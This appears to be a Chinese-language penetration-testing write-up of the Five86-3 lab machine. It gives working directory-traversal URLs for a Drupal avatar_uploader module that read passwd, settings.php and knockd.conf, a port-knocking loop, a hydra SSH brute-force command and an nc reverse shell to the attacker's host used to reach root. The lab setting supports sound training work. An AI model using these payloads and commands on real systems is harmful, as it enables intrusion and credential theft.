STATEMENT
声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。
雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
靶机信息
信息搜集
下载好靶机解压后,直接打开文件夹里的.ova文件即可
将靶机设置为NAT模式后,kali和靶机为同一网段使用nmap扫描同网段的信息,筛选出目标ip地址
nmap -sn 192.168.74.0/24
对目标主机做进一步的扫描
信息比较少,只有一个80端口的信息,其他端口都被过滤为filter状态
nmap -A 192.168.74.138
漏洞利用
访问网站发现为drupal站点,版本为drupal 7,但是没有具体的版本号
搜了下7版本漏洞,试了几个大多用不了
最后是发现有个目录遍历的漏洞
查看该漏洞文档
根据漏洞文档的内容构造url如下,读取到passwd内容
http://192.168.74.138/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
根据DC-1的经验,在drupal的配置文件里可以看到一些数据库的内容
构造url如下,查看drupal配置文件
http://192.168.74.138/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../var/www/html/sites/default/settings.php
查看源代码看起来方便些,找到个密码x4lB0XxX,但是缺少用户名
根据passwd文件的内容,发现有4个可登录的用户
使用用户名和密码尝试登录站点,都失败了,密码可能不是站点的
还发现了有sshd账号,可能运行有ssh进程,但是端口被过滤了
现在还没有权限,很多东西看不了,可以通过查看cpu任务调度的文件来查看进程
发现一个特殊的进程knockd,需要指定的方式才能访问到端口,也叫端口敲门
http://192.168.74.138/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../proc/sched_debug
查看knockd进程配置文件,需要依次向22端口发送5004,4284,6872
http://192.168.74.138/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/knockd.conf
使用nmap敲击端口,再次扫描22端口后为开放状态
for x in 5004 4284 6872;do nmap -Pn --max-retries 0 -p $x 192.168.74.138;donenmap -p 22 192.168.74.138
使用hydra暴破下ssh端口,把用户名写到文本中当做用户名字典
hydra -L user.txt -p x4lB0XxX -t 5 -v ssh://192.168.74.138
权限提升
根据暴破出的信息登录到sam账户
ssh -l sam 192.168.74.138
sudo -l发现有个脚本文件,是一个重启apache的脚本
写入nc命令,用sudo权限执行该脚本反弹shell回连到kali上,就可获得到root权限
nc 192.168.74.129 666 -e /bin/bashnc -lvp 666
连接成功后,当前用户为root
在root目录下获取到flag
RECRUITMENT
招聘启事
END
长按识别二维码关注我们
原文始发于微信公众号(雷神众测):Five86-3靶机渗透测试记录
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论